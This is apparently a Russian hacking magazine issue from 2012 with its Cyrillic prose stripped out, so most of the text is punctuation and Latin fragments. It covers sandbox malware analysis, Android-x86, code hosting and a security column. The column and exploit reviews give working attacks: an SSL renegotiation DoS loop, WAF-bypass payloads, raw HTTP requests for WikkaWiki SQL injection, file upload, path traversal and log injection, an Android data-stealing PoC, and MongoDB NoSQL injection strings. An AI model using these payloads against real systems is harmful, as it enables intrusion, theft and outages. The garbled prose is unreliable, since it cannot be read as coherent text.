BoxNameTitle=n
BorderColor=#0000FF
NotifyInternetAccessDenied=y
Template=BlockPorts

, , .

!
, ,
.
, Sandboxie:
.
Buster Sandbox
Analyzer.
, bsa.exe Plugins.
Options Analysis mode
Manual Options Program
Options Windows Shell Integration Add
right-click action "Run BSA".
: .



. , : www.
malwaredomainlist.com ,

. pp.exe
- .
,
, .
, ,
/ -
, .
?

Run BSA. Buster Sandbox
Analyzer.
Sandbox folder to check.
,
Sandboxie,
BSA,
FileRootPath=C:\
Sandbox\%SANDBOX%,

PORTABLE-
, ,
- , . .
,
,
,
.
: tools.safezone.cc/gjf/Sandboxie-portable.zip.

start.cmd,
stop.cmd,

,
.

:
Sandboxie.ini.
template, Templates.

038

,
Sandboxie,
,

Templates.
,
- .
$(InstallDrive),
.
FileRootPath.
:
FileRootPath=$(InstallDrive)\
Sandbox\%SANDBOX%

, Sandboxie.

, , :
FileRootPath=C:\Sandbox\%SANDBOX%

,
.

.
,
.
,
,
,
,
,
.

02 /157/ 2012

Buster Sandbox
Analyzer. -
FileRootPath
, . Buster
Sandbox Analyzer ,
.
BSA

, . Start Analysis.
. ,
, -
,
.
.
?

,
, BSA.

API-, -. ,
Buster Sandbox Analyzer ,
,

Finish Analysis.
, ?
.

, ,

02 /157/ 2012

1. Sandboxie
. ,
.
2. API- , ,
. Sandboxie
- . ,

.

,
Sandboxie .
, pp.exe .
Finish
Analysis Buster Sandbox Analyzer.


Malware Analyzer,
. :

C:\Documents and Settings\\Application Data\dplaysvr.exe,
(,
),
190.9.35.199
hosts-. , VirusTotal

, .


Viewer Buster Sandbox Analyzer.
API-,
, ,
.
Reports Buster Sandbox Analyzer.
Report.
txt ( View Report),
. ,

, -

http://190.9.35.199/view.php?rnd=787714,

G4FGEXWkb1VANr . .
,
, .
Sandboxie
.
:
drive , ,
user , (%userprofile%).
dplaysvr.exe dplayx.dll, tmp hosts. , ,
:
94.63.240.117 www.google.com
94.63.240.118 www.bing.com

, . , (
),
- , ,
, . , ,
, ,
RegHive.
reg-
:
REG LOAD HKLM\uuusandboxuuu RegHive
REG EXPORT HKLM\uuusandboxuuu sandbox.reg
REG UNLOAD HKLM\uuusandboxuuu
notepad sandbox.reg

, sandbox.reg,
, .
Options Cancel
analysis, . ,

,
. ,
. z

039

PC ZONE

Ant (a.zhukov@real.xakep.ru)

Android
x86

WWW


ADB



bit.ly/2s9b0J.


ANDROID


?
Android ,
.
. ,
. , ,

Android
PC.

ANDROID-X86
, Android
Google.
.
, ,
Android.
patch hosting for android x86
support. x86-.
, , .
Android-x86 (www.android-x86.org)
. Android-x86, Android, .
Eee
PC, , . ,
( ASUS Eee,
Viewsonic Viewpad 10, Dell Inspiron Mini Duo, Samsung Q1U, Viliv
S5, Lenovo ThinkPad x61 Tablet). Wi-Fi.
, Android , ,
,
, ,
Android,
(,
,
). .

vga=ask

040

1. . LiveCD.
2. ( android-x86-2.2-r2-asus_
laptop.iso),
, VirtualBox
(www.virtualbox.org). :

02 /157/ 2012

Android x86

Android-x86

: Android
: Linux
: Other Linux ( Linux 2.6)
: 512
: 3

3.

4.

5.

6.

Android-x86 DVD-.
.
LiveCD,
.
, Run Android-x86 without
installation.
Android ,
Installation Install Android-x86 to harddisk.
,
. ,
Create/Modidy partitions,
cfdisk. (),
,
Bootable. , .

.
ext3, GRUB /
system /. Android, SD-,
. , ,
.
. ,

Android-x86 ( ) . :
debug.
Android-.
,
( Right
Ctrl + I).
-,
Android . ,
, , 4.0
devel, . , - . , ,
. 3.2RC2 , ,
Ethernet,
. Android, .
2.2.


, ? , , .
Android-x86, - ? , Android-x86
Android Market
, Google.
,
Android-. Android-x86 -


. Android-x86
.
,
Youtube . ,
,

Intel HD Audio
. ,
FAQ,
, ICH AC97
VirtualBox (bit.ly/v4H7YQ).

02 /157/ 2012

. Android
,
. ,
,
, ,


. .

, GRUB
, Android-

x86 2.2 (HDPI). e


.
,
kernel /android-2.2/kernel /quiet root .....
e
vga=ask. Enter b .

,
. ,
115286432 VESA 34.

041

PC ZONE

GSDSERVER
, Android-x86
GDBserver, /sbin/gdbserver. , GDB
. ,
,
GDBserver:
root@android:/ # gdbserver <VirtualBox ip address>:1234 \
[ ]

Android


:
1.
. Settings Applications
Unknown sources .
, , ,
, .
2. ,
.
.
. Install . ? ,
Android-x86. .
, AndAppStore,
Android-x86. Android Market:
,
.

"--attach pid",
, .

. GDB:
# gdb
:
gdb > target remote <VirtualBox ip address>:1234
!

,
:
1 NAT (
eth0, ).
2 (
eth1, ).


, , Android,
, ,
. , ,
.
,
. Android-
(
), ,

. Ethernet , NAT
.

.
Android x86 ,
. , Settings Configure Ethernet
eth0 dhcp, .
.
, Alt + F1...F6 (Alt + F7
).
:
root@android:/ # netcfg
lo
UP
127.0.0.1
eth0 UP
10.0.2.15

255.0.0.0
255.255.255.0

0x00000049
0x00001043


,
Android-
(, ),
Bluestacks
(bluestacks.com),
AMD. ,
Android,

. ?

042

, .

,
, .
.
,
HD-ApkHandler.exe
.
Android
( apk-)

. ,
.
, , -
. ,
Angry Birds Fruit Ninja,
BlueStacks ,

.
.

02 /157/ 2012

Android x86

eth1 DOWN 0.0.0.0


0.0.0.0
root@android:/ # netcfg eth1 down
root@android:/ # netcfg eth1 dhcp
action 'dhcp' failed (invalid argument)
root@android:/ # netcfg eth1 up
root@android:/ # netcfg
lo
UP
127.0.0.1
255.0.0.0
eth0
UP
10.0.2.15
255.255.255.0
eth1
UP
192.168.56.101 255.255.255.0

0x00001002

0x00000049
0x00001043
0x00001043

, , :
, .
.


Android SDK
(developer.android.com/sdk/index.html).
1. android-sdk_r16-windows.zip . platform-tools. , . SDK
Manager .
Tool Android SDK Platform-tools. platform-tools,
.
2. ADB. ADB Android Debug Bridge ( ). Google
Linux, . ,
,
, , -,
, -,
.
ADB .


Android.
3. ,
:
adb connect 192.168.56.101

connected to 192.168.56.101:5555


, :
:\android-sdk-windows\platform-tools>adb devices
List of devices attached
emulator-5554
device
192.168.56.101:5555
device

emulator-5554 Google,
192.168.56.101:5555 .
4. Eclipse,
, .

Android-x86?
, . 4.0
, .
3.2 ,
. 2.2
.
:
SDK,
- . ,
Android
, , . z

SHORTCUT

AndAppStore

02 /157/ 2012

Windows Home Android;


Esc Android;
F2 Menu;
F3 ;
Alt + F1 ;
Alt + F7 GUI.

043

PC ZONE

044


v001, v002
.
,
,
.
,
.

INFO


,
,
,

#12/2011
][
Git&GitHub:
.

02 /157/ 2012

? ,


. ,
.


.
,
wiki

SourceForge

. , ,
issue tracker? mediocre,
trac - .
,
: wiki, , . . ,
,
. shell,
FTP SCP.
PHP/Ruby/Python MySQL.

:

. , ,
-

www.sourceforge.net
:
CVS, SVN, Git, Mercurial, Bazaar.
:
.
:
Wiki, bug tracking, code review, , , shell-.
SourceForge
.

_.sourceforge.net, .

-

Google Code
code.google.com/hosting
:
GIT, SVN, Mercurial.
: .
:
code review, wiki, release hosting, issue tracker.
,
Google
SourceForge. .
wiki, issue
tracker .

Assembla
www.assembla.com
:
Git, SVN, Mercurial.
:
.
:
wiki, tickets, code review, ftp, time tracker, build
system.
.
,
.

02 /157/ 2012

. ,
, , GitHub
Google Code,
wiki
(
) Sources. issue- .
issue
. , ,
Google.
Gmail.
Google Groups issue tracker'.

Scrum
(
), ,
(Agile).
, :

.
,
wiki, files, messages ( ), ,
,
, ,
. ( )

issue tracker .
, , ,
,
GitHub, . .

SourceForge

. ,
SourceForge
: .
2000
Savannah.
: .

Google Code

, , Google.
: Google .

Assembla

,
: , , time
tracking . .
: .

045

PC ZONE

Bitbucket
bitbucket.org
:
Git, Mercurial.
:


( ).
.
JIRA,
.
Atlassian,
, , . Bitbucket ( )
, GitHub.

GitHub
github.com
:
Git, SVN (git-svn).
:
(300
),
( ), .
:
code review, fork, wiki, issue tracker,
, .
, , . .
- Facebook

CodePlex
www.codeplex.com
:
.
:
Mercurial, TFS (Microsoft Team Foundation
Server).
:
wiki, code review, .
- .Net,
Codeplex.
Microsoft. , ,

046


Git, Mercurial,
.

:
Mercurial, Git. , - Bitbucket,
(
). GitHub
.

. (
,
), GitHub . ,
review

.
, ,
, ,
- .
.
(diff viewer),

. ,
.
, , ( pull request)
.
Git.
-
, ,
(merge requests).
, ,
,

.
Net. , Visual Studio
,
, CodePlex.
. _.codeplex.com. ,
,

.
,
. . CodePlex

GitHub.
,
-

Bitbucket

review .
Bitbucket
,
- JIRA, REST API
( API GitHub).
: Git Mercurial.

GitHub

. GitHub
review .

,
.
GitHub, , , ,
Git-.
.
: Git .

CodePlex

,
wiki, . , , , ( ),
.
: .Net.

02 /157/ 2012

Gitorious
gitorious.org
:
Git.
:
.
:
wiki, code review, .
, Git- .
, GitHub,
. ,
Gitorious
. ,

Kiln
www.fogcreek.com/kiln
:
Mercurial.
: ( 45 ).
:
code review, bug tracker.

Mercurial-, ,
, . .

Launchpad
launchpad.net
:
Bazaar.
:
.
:
code review, bug tracker, faq, answers.

,
Bazaar,
Canonical. , Launchpad .

?
.
, GitHub Bitbucket.
, :

,

02 /157/ 2012



(, ).
, ,
, , . , .
,
- review .
wiki
.
blob' ( Git ) .
,
, GitHub: ,
. GitHub

,
,
Git-, SVN-,
Mercurial-.

TortoiseHg,
. Kiln review-, UI .
bug tracker' ,
, FogBugz
(, ).
,
. , Kiln

Gitorious

, Gitorious
. Qt, , ,
.
: Git.

Kiln

, . , ,
.
: Mercurial .

,
, : ,

Ubuntu Linux. ,
Launchpad . , Ubuntu PPA (Personal
Package Archives),

. ,
Lauchpad, Linux-.
, . ,
,
code review

,
.
: Ubuntu.

. GitHub
, Bitbucket .
, .
Net, , CodePlex
Visual Studio.
-

,
,
Google Code.
Ubuntu Linux, LaunchPad.
Assembla Kiln , ,
. :). z

Launchpad

047

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

, . ,
, .
keep-state, .
, ,
. ,
XYZ ZYX TCP, ,
( ),
.
,
.
, ,
.
, (TCP- SYN-) . , TCP/IP- , RFC
. .
,
TCP- , SYN ( ,
RFC ).
Windows, Linux (, ).
goo.gl/9mu12.
? ,
, , ,
FIN, ACK, RST ( ).
, .
, -

048

. ,
SYN- , RST-.
, . TCP- SYN + FIN,
, , , ,
. ( )
SYN + ACK, ACK',
, .
, .
,
.
, !

, TCP- SYN-FIN

02 /157/ 2012

EASY HACK

WORDPRESS

WordPress CMS
. , , ,
, . ,
WordPress , . -

, -
.
, .

,
-. WordPress

WPScan (code.google.com/p/wpscan/).
Ryan Dewhurst.
, , .
-, . -, ( WPScan'
2220) , , . .
:
. ,
. , , ,
, .
. (, Ruby? :))
ruby ./wpscan.rb --url www.example.com --enumerate p

WordPress

--url www.example.com , --enumerate p ,


. , , WordPress WP Security
Scan (goo.gl/Ykcn8).

NMAP


, Nmap (nmap.org).
. Nmap
:
1. nmap (-oN) .
2. gnmap (-oG) grep.
3. xml (-oX) XML.
4. $crIpt KiDDi3 (-oS) leet speak.
, -oA,
.
gnmap,
XML ( ZenMap, ).
-
?
. , , XML,
!
, xmlsoft.org/XSLT/xsltproc.html xsltproc (,
BackTrack), :

.
HTML-. , , ,

XML-.

xsltproc nmap_scan.xml -o nmap_scan.html

nmap XML-,

02 /157/ 2012

Nmap

049

/ EASY HACK

MSF

,
. , ,
, Ruby MSF,
:
msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each_key do |session|
run_single("set SESSION #{session}")
print_status("Running #{active_module.fullname}
against #{session}")

run_single("run")
sleep 1
end

, rc-
:
msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> resource runall.rc

! .
Jcran' (goo.gl/sIhXf).

DOS SSL

SSL.
SSL Renegation vuln
SSLv3/TLS-.
2009 ,
. , ,
renegation (
TCP-) ,
.

SSL-.
( ), . ,
. :-)
, ,
THC ,
DoS- SSL (www.thc.org/thc-ssl-dos). (renegation)
SSL-.
? . THC , 15 , ,
300 -
. ,
(DSL), .
? . - Vincent Bernat , SSL DoS' (goo.gl/Uqw8o).
,
, , ,
. ,
.
, . THC :
thc-ssl-dos.exe 127.1.1.1 443 --accept

127.1.1.1 IP , 443 -

050

SSL DoS

( SSL ), --accept
, . :-)
, renegation . ,
SSL-,
.
. bash- THC:
thc-ssl-dosit() { while :; do (while :; do echo R; done) |\
openssl s_client -connect 127.1.1.1:443 2>/dev/null; done }\
for x in `seq 1 100`; do thc-ssl-dosit & done

, HTTPS. , SSL (FTPs, POP3s),


. ,
renegation',
- IP.
goo.gl/Uqw8o.

02 /157/ 2012

EASY HACK

WAF

, WAF (web application firewall)


,
OSI.
web-, SQL XSS. WAF
- . , ,
, (, ), WAF' ,
. ,
, , . , WAF.
? .
.
, ,
HTTP RFC,
- -.
, .
HTTP HPP (HTTP Parameter Pollution). ?
. -, ,
, Query String.
?. -,
_=. -,
&
;. ,
(,
urlencode PHP). :
#GET
GET /foo?par1=val1&par2=val2 HTTP/1.1
#POST
POST /foo HTTP/1.1
Content-Length: 19
par1=val1&par2=val2

, HPP
. , ,
RFC, - -. HTTP:

:
ASP ASP.NET ,
(par1=val1,val2,val3);
Apache PHP (par1=val3);
Apache Perl (ARRAY[0x8b9059c]);
Apache Tomcat (par1=val1).
? - .
, ,
, , . HPP
Luca Carettoni Stefano di Paola (goo.gl/9b9lx).
WAF , HPP, ModSecurity ASP:
#
index.aspx?page=select 1,2,3 from table where id=1/
#
index.aspx?page=select 1&page=2,3 from table where id=1

, HPP . 2009 .
HPP-,
Ivan Markovic Network Solution (netsec.rs),
whitepaper HTTP
Parameter Contamination (HPC). ,
.
, RFC, HTTP :
1. , az, AZ, 09 and _ . ! ~ * ' ( ).
2. ; / ? : @ & = + $ ,.
,
{ } | \ ^ [ ] `. -
.
.
.
HPC
WAF.
1. ModSecurity. http://localhost/?xp_cmdshell , http://localhost/?xp[cmdshell .
2. dir traversal URLScan. http://192.168.2.105/
test.asp?file=../bla.txt , http://192.168.2.105/
test.asp?file=.%./bla.txt .

GET /foo?par1=val1&par1=val2&par1=val3 HTTP/1.1

HTTP Parameter Contamination

02 /157/ 2012

051

(ivinside.blogspot.com)
(115612, . , .1)


. ,
, !

WikkaWiki

CVSSV2

7.5
(:N/AC:L/AU:N/C:P/I:P/A:P)

BRIEF


WikkaWiki, Egidio Romano aka
EgiX. ,
: , -
.

).
. :
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2cslud
ij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&
default_comment_display=',email=

EXPLOIT

1. SQL- UPDATE.
/actions/usersettings/usersettings.php, 140152:
default: // input is valid
$this->Query("
UPDATE ".$this->GetConfigValue('table_prefix')."users
SET email = '".mysql_real_escape_string($email)."',
doubleclickedit='".mysql_real_escape_string($doubleclickedit)."',
show_comments='".mysql_real_escape_string($show_comments)."',
default_comment_display='".$default_comment_display."',
revisioncount = ".$revisioncount.",
changescount = ".$changescount.",
theme = '".mysql_real_escape_string($usertheme)."'
WHERE name = '".$user['name']."'
LIMIT 1"
);

, , ,
mysql_real_escape_string() default_comment_display, ,
SQL-.
users,
, . -,
, -, MySQL
(, /*, */

052

AfdJoinLeaf

02 /157/ 2012

(SELECT sessionid FROM wikka_sessions WHERE


userid='WikiAdmin'),theme='

, ,
UserSettings, e-mail.
( Logout),
, .
magicQuotesWorkaround, magic_quotes_gpc = off.
2. .
/actions/files/files.php, 266278:
elseif (preg_match('/.+\.('.$allowed_extensions.
')$/i', $_FILES['file']['name']))
{
$strippedname = str_replace('\'','',
$_FILES['file']['name']);
$strippedname = rawurlencode($strippedname);
$strippedname = stripslashes($strippedname);
$destfile = $upload_path.DIRECTORY_SEPARATOR.$strippedname;
if (!file_exists($destfile)) {
if (move_uploaded_file($_FILES['file']['tmp_name'],
$destfile)){
$notification_msg = T_("File was successfully uploaded.");
}

'INTRANET_MODE' , , , , PHP-.
$allowed_extensions, . :
'gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|
asc|txt|zip|gtar|gz|bz2|tar|rar|vpp|mpp|vsd|mm|htm|html'

,
MIME- Apache, mm, vpp,

PHP-.
test.php.mm <?php phpinfo(); ?>:
POST /wikka/test HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=upjhsdd5rtc0i
b55gv36l0jdt3
Content-Length: 251
Content-Type: multipart/form-data;
boundary=--------1503534127
Connection: keep-alive
----------1503534127
Content-Disposition: form-data; name="file";
fi lename="test.php.mm"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
----------1503534127
Content-Disposition: form-data; name="upload"
Upload
----------1503534127--

3. . -

02 /157/ 2012

/handlers/files.xml/files.xml.php

/handlers/files.xml/files.xml.php.
.
, 54, ,
.
Path Traversal
:
http://localhost/wikka/test/fi les.
xml?action=download&fi le=/../../wikka.config.php

4. .
logSpam() /libs/Wakka.class.php,
13151343:
function logSpam($type,$tag,$body,$reason,$urlcount,$user='
',$time='')
{
$spamlogpath = (isset($this->config['spamlog_path'])) ?
$this->config['spamlog_path'] : DEF_SPAMLOG_PATH;
if ($user == '')
{
$user = $this->GetUserName();
}
if ($time == '')
{
$time = date('Y-m-d H:i:s');
}
if (preg_match('/^mass delete/',$reason))
{
$originip = '0.0.0.0';
}
else
{
$originip = $_SERVER['REMOTE_ADDR'];
}
$ua = (isset($_SERVER['HTTP_USER_AGENT'])) ?
'['.$_SERVER['HTTP_USER_AGENT'].']' : '[?]';
$body = trim($body);
$sig = SPAMLOG_SIG.' '.$type.' '.$time.' '.$tag.' - '.
$originip.' - '.$user.' '.$ua.' - '.$reason.' - '.
$urlcount."\n";
$content = $sig.$body."\n\n";
return $this->appendFile($spamlogpath,$content);
}

spam_logging,
PHP- ,
$spamlogpath ( ./spamlog.txt.php)
$_SERVER['HTTP_USER_AGENT']. ,

053

/
:
POST /wikka/test/addcomment HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=6l11flsnvef642
oajav0ufnp83
User-Agent: <?php phpinfo(); ?>
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
body=foo&submit=Add+Comment

fwrite($fp, print_r($_POST, TRUE)) or


die("Couldnt write data to file!");
fclose($fp);
echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";
}
TARGETS

Android < 2.3.4.


SOLUTION

1. JavaScript .
2. .

TARGETS

WikkaWiki <= 1.3.2.

SOLUTION

Wikka 1.3.2-p7.

CVSSV2


Android

CVSSV2

4.3
(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BRIEF

OC Android
.
. ,

Android.
EXPLOIT

:
1. Android .
2. JavaScript- , .
3. JavaScript- .
, Exploit DB 18164,
.
:
function stage0($scripturl) {
echo "<b>Android < 2.3.4</b><br>Data Stealing Web
Page<br><br>Click: <a href=\"$scripturl?stage=1\">
Malicious Link</a>";
}


JavaScript-,
- com.android.htmlfileprovider:
function stage1($scripturl) {
echo "<body onload=\"setTimeout('window.location
=\'$scripturl?stage=2\'',1000);setTimeout('window.
location=\'content://com.android.htmlfileprovider/
sdcard/download/poc.html\'', 5000);\">";
}

JavaScript- . .
:
function stage3() {
$fp = fopen("files.txt", "w") or
die("Couldnt open file for writing!");

054

MS11-080:
AFD
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)

BRIEF

,
, Bo Zhou. , afd.
sys (ancillary function driver),
, .
,
, .
afd.sys
TCP/IP- tcpip.sys Winsock. NPI
Winsock Kernel (WSK).
EXPLOIT

AfdJoinLeaf.
, ,
afd IOCTL 0x120bb:
PAGEAFD:0001B190 ; __stdcall AfdDispatchDeviceControl(x, x)
...
PAGEAFD:0001B1C4 mov
[edx+1], al
PAGEAFD:0001B1C7 mov
esi, _AfdIrpCallDispatch[esi]
; IOCTL 0x120bb, esi == 0x12270
PAGEAFD:0001B1CD test
esi, esi
PAGEAFD:0001B1CF jz
loc_21AF3
PAGEAFD:0001B1D5 call
esi ; call AfdJoinLeaf
...
.data:000121B8 _AfdIrpCallDispatch dd offset @AfdBind@8
.data:000121B8
; DATA XREF: AfdDispatchDeviceControl(x,x)
.data:000121B8
; AfdBind(x,x)
...
.data:00012270
dd offset @AfdJoinLeaf@8
; AfdJoinLeaf(x,x)
...

,
:
0x18;
0;
DWORD
0x00000001;
WORD [ + 0x34],
8, [ 0xC]

02 /157/ 2012

JavaScript- Android

PAGE:00016C1D
PAGE:00016C1F
PAGE:00016C22
PAGE:00016C24
PAGE:00016C27
PAGE:00016C2A
PAGE:00016C2D
PAGE:00016C30
PAGE:00016C36
PAGE:00016C39
PAGE:00016C3B

mov ebx, edx ; IRP Stack


mov [ebp+Irp], ecx ; ecx = IRP
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+P], esi
mov eax, [ebx+8] ;
cmp eax, 18h ; 0x18
jb loc_170E2
mov edx, [ebx+4] ;
cmp edx, esi ; == 0
jz short loc_16C46


IRP.
AfdRestartJoin 0x00016f54.
AfdConnectApcKernelRoutine,
NTSTATUS- IRP ( 0xC0000207).
0xC0000207 ,
- 0x000207xx.
TARGETS

Windows XP Service Pack 3, Windows XP Professional x64 Edition


Service Pack 2, Windows Server 2003 Service Pack 2, Windows Server
2003 x64 Edition Service Pack 2, Windows Server 2003 SP2 Itaniumbased-.
SOLUTION

, .

MS11-038 Microsoft Office


Excel,
OBJ

CVSSV2

9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

02 /157/ 2012

055

/
xls-.
, .
EXPLOIT

OBJ Excel , Line,


Rectangular, CheckBox . .
OBJ-, .
BIFF.
,
, , .
:

ftEnd
()
()
()
ftMacro
ftButton
ftGmo
ftCf
ftPioGrbit
ftPictFmla
ftCbls
ftRbo
ftSbs
ftNts
ftSbsFmla
ftGboData
ftEdoData
ftRboData
ftCblsData
ftLbsData
ftCblsFmla
ftCmo

00h
01h
02h
03h
04h
05h
06h
07h
08h
09h
0Ah
0Bh
0Ch
0Dh
0Eh
0Fh
10h
11h
12h
13h
14h
15h

OBJ-

Fmla-style macro
Command button
Group marker
Clipboard format
Picture option flags
Picture fmla-style macro
Check box link
Radio button
Scroll bar
Note structure
Scroll bar fmla-style macro
Group box data
Edit control data
Radio button data
Check box data
List box data
Check box link fmla-style macro

ftCmo, ftEnd.
ftCmo:

0
2
4
6
8
14


ft
cb
ot
id
grbit
(Reserved)

2
2
2
2
2
12

=ftCmo (15h)
ftCmo

ID

; == 0

sub_30164E23,
, . , ,
. ,
, sub_3012FABC:
.text:3012FAC8
.text:3012FACB
.text:3012FACD
.text:3012FAD3
.text:3012FAD6
.text:3012FAD9
.text:3012FADC
.text:3012FADF
.text:3012FAE2
.text:3012FAE5
.text:3012FAEB
.text:3012FAF1

056

mov
xor
cmp
mov
mov
mov
mov
mov
mov
ja
cmp
jnz

edi, [ebp+arg_0]
esi, esi
dword_307E1FB4, esi
ebx, [edi+6]
[ebp+var_4], esi
[ebp+var_4C], esi
[ebp+var_48], esi
[ebp+var_44], esi
[ebp+var_40], esi
loc_30274818
dword_307DB7A4, esi
short loc_3012FAFB

.text:3012FAF3
.text:3012FAF5
...
.text:30127293
.text:30127296

cmp
jnz

ebx, esi
loc_30127293

push
call

dword ptr [ebx+4]


sub_30127263

, ftCmo, edi.
ebx 0x6
. ftCmo,
, , , 12 . , ebx,
.
, ,
0x30127293
ebx+4 . sub_30127263.
, , ebx, .
sub_30127263
( ) 0x10
MSO_804.
.text:30127263
.text:30127264
.text:30127266
.text:30127269
.text:3012726A
.text:3012726D
.text:3012726E
...

push
mov
mov
push
mov
push
call

ebp
ebp, esp
eax, [ebp+arg_0]
esi
esi, [eax+0Ah]
esi
MSO_804 ;[307D538C]

MSO_804 0x3c .
30E27FB0
30E27FB1
30E27FB3
30E27FB6
30E27FB8
30E27FBE
30E27FC1
30E27FC2

PUSH EBP
MOV EBP,ESP
MOV EAX,DWORD PTR SS:[EBP+8]
TEST EAX,EAX
JE mso.30C7A572
MOV EAX,DWORD PTR DS:[EAX+3C]
POP EBP
RETN 4

, MSO_804 ( ) ecx.
call dword ptr [ecx+0x11]...
...
.text:30127274
test
eax, eax
.text:30127276
jz
short loc_3012728E
.text:30127278
mov
ecx, [eax]
.text:3012727A
lea
edx, [ebp+arg_0]
.text:3012727D
push
edx
.text:3012727E
push
0BEh
.text:30127283
push
esi
.text:30127284
push
eax
.text:30127285
call
dword ptr [ecx+11Ch]
; <---
TARGETS

Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office


XP) on Windows XP SP3, Microsoft Office Excel 2002 10.6501.6626
Service Pack 3 (Office XP SP3) on Windows XP SP3.
SOLUTION

, . z

02 /157/ 2012

>> coding

DVD




,


.

(blog.chivavas.org)

MongoDB

NOSQL

WWW
www.mongodb.org

MongoDB;
nodejs.org

NodeJS;
ru.wikipedia.org/
wiki/NoSQL
NoSQL;
nosql-database.org

NoSQL.

Redis, MongoDB, memcached


, MySQL, Oracle Database MSSQL.
,
. NoSQL-!

058

02 /157/ 2012

MongoDB

NOSQL
, ,
(), .
SQL .
: MySQL, Oracle, Microsoft SQL Server.
, , NoSQL-:
- (Redis, BigTable, memcached);
- (MongoDB, CouchDB);
, (Neo4j, Sones GraphDB);
- (db4o, Cache, Jade);
XML- (eXist, BaseX).
NoSQL- SQL- ,
. , MongoDB
BSON, eXist XQuery, Sonic GraphDB
GraphQL, , . NoSQL- , . , ,
SQL-, NoSQL- .
.

NOSQL-?
,
, SQL
SQL-injection. -
: SQL SQL-. , SQL-, ,
. NoSQL ,
,
:
REST- (CSRF);
;
, NoSQL (, MongoDB JavaScript-);
, (SQL , BSON
MongoDB . .), , , .
NoSQL. :
;
API NoSQL;
NoSQL-.
. , .
, .

, , , -
.
:
, ,
, , - .
,
! API. NoSQL
. ,
,
. ,
.
, , API, , ,
.
, , . ,
,
.
, SQL-,
, JSON, JavaScript - .
, !
MongoDB NoSQL-.

NOSQL- MONGODB
web-.
,
( README.RU.txt).
,
http://127.0.0.1:31337. ,
:
;
JSON-;
REST-;
JavaScript-.

.


NoSQL Google Insights

02 /157/ 2012

MongoDB, NoSQL-, . ,

059

Web- MongoDB

, .
MongoDB
$regex. ,
, "ro",
:
db.users.find({ login: { $regex: "^ro" } }).

, MongoDB,
,
bit.ly/cqW1RH.
. web- MongoDB. ,
. mongodb.js Lib.
MongoDbController, -

060

REST (Representational state transfer)


, ,

, URL. URL,
, .
.
HTTP HTTPS,
: GET (), PUT (), POST
() DELETE ().
BSON (Binary JavaScript Object Notation)

.
JSON
JSON (Binary JSON).

.
regexp:
var regexpPwd = new RegExp("^" + password, "i");
var loginParam = { login: login, password: regexpPwd };

, ,
. password , .
root
, [\s\S]*. MongoDB
: db.users.findOne({login: 'root', password:
/^[\s\S]*/i}),
root ( SQL- 1' or 1=1
--). . -,
,
, ,
.
. -,
, . ,
:
db.users.findOne({ login: 'root', password: 'p@ssw0rd' })

, .

JSON-
, MongoDB SQL,
. MongoDB
SQL
JSON (BSON). ,
- (,
). JSON-.
,
JSON-. ,
. ,

02 /157/ 2012

MongoDB

. json-injection MongoDbController:
var loginParam = eval("({ login: '" + login + "',
password: '" + password + "' }));


JavaScript ( MongoDB) .

.
,
! ,
root'})// ( )
. , ! ? . root'})//, eval :
//
({ login: 'root'})//', password: '' })
//
db.users.findOne({ login: 'root' })

,
JavaScript web. , ' + process.execPath})//

API NoSQL

NoSQL
NoSQL-

/listDatabases?text=1 ;
/serverStatus?text=1 .

db.users.findOne({ login: 'C:\\node.exe' })

Server Side JavaScript


Injections SSJI. ?
1. . ,
^[a-zA-Z]+$.
2. eval JSON. Node.
js JSON.parse,
.

REST-
-
(SOA) REST.
,
REST, RESTful. MongoDB :
REST- . ,
Sleepy Mongoose, REST.
, REST-,
MongoDB. -rest. REST- http://127.0.0.1:28017/.
web-,

. :

REST-
URL :
http://127.0.0.1:28017/_//?
filter_=

REST-
web-
REST- MongoDB.
rest MongoDbController:
var restQry = "/secure_nosql/users/?filter_login="
+ login + "&filter_password=" + password;
var hash = restQry.indexOf("#");
if (hash > -1) { restQry = restQry.substring(0, hash); }

REST-,
#. REST- ,
HTTP- JSON.
, root
secure_nosql : http://127.0.0.1:28017/
secure_nosql/users/?filter_login=root&filter_password=p@ssw0rd.
, , #. root#,
. ,
URL: http://localhost:28017/secure_

Mongo MongoDB

02 /157/ 2012

061



, .
JavaScript MongoDB?
1. $where. , db.orders.
find({ $where: "this.amount > 3" }) ,
.
2. db.eval. , db.eval("function (x) { return x * x;
}", 2) .
3. . MongoDB
, JavaScript, .
system.js. foo(x), :

nosql/users/?filter_login=root#&filter_password=. ,
filter_password
http://localhost:28017/secure_
nosql/users/?filter_login=root.
, REST-
(CSRF):
<img src="http://localhost:28017/secure_nosql/users/" />

, RESTful,
. REST.
, Robust Defenses
for Cross-Site Request Forgery (bit.ly/cbVLvY), REST.

JAVASCRIPT-
. Microsoft SQL Server,
ANSI SQL
-.
T-SQL ( SQL,
SQL Server), C#
.NET- .
MongoDB ,
JavaScript. . ,

db.system.js.save( { _id: "foo", value: function (x)


{ return x * x; }})

: db.eval("foo(2)").
4. Map/Reduce. Map/Reduce , Google
. : map,
, reduce,
.
MongoDB map/reduce .
,
, map
reduce.
MongoDB (bit.ly/4V7mD).
JavaScript- $where db.eval.
c $where.
$where JavaScript. ssji-where MongoDbController:
var js = "this.login === '" + login +
"'&& this.password === '" + password + "'";
var loginParam = { "$where" : js };

, -

FAQ NOSQL
Q


NOSQL?

NoSQL SQL
A (No SQL at all), SQL
(Not only SQL). 1998
: (Carlo
Strozzi)
.
2009-,
(Eric Evans) , ,
.
, NoSQL.

062

MONGODB?
